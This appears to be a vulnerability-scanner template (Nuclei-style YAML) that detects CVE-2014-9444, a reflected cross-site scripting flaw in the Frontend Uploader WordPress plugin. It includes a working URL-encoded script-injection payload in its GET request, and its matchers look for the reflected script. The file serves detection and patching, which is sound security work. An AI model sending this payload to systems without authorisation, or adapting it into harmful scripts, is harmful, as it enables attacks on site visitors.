49 lines
1.6 KiB
YAML
49 lines
1.6 KiB
YAML
id: CVE-2014-9444
|
|
|
|
info:
|
|
name: Frontend Uploader <= 0.9.2 - Cross-Site Scripting
|
|
author: daffainfo
|
|
severity: medium
|
|
description: The Frontend Uploader WordPress plugin prior to v.0.9.2 was affected by an unauthenticated Cross-Site Scripting security vulnerability.
|
|
remediation: |
|
|
Update to the latest version of the Frontend Uploader plugin (0.9.2) or apply the vendor-supplied patch to fix the vulnerability.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/f0739b1e-22dc-4ca6-ad83-a0e80228e3c7
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2014-9444
|
|
- http://packetstormsecurity.com/files/129749/WordPress-Frontend-Uploader-0.9.2-Cross-Site-Scripting.html
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
|
|
cvss-score: 4.3
|
|
cve-id: CVE-2014-9444
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00287
|
|
epss-percentile: 0.65219
|
|
cpe: cpe:2.3:a:frontend_uploader_project:frontend_uploader:0.9.2:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: frontend_uploader_project
|
|
product: frontend_uploader
|
|
framework: wordpress
|
|
tags: wp-plugin,xss,wpscan,packetstorm,cve,cve2014,wordpress,unauth
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '</script><script>alert(document.domain)</script>'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|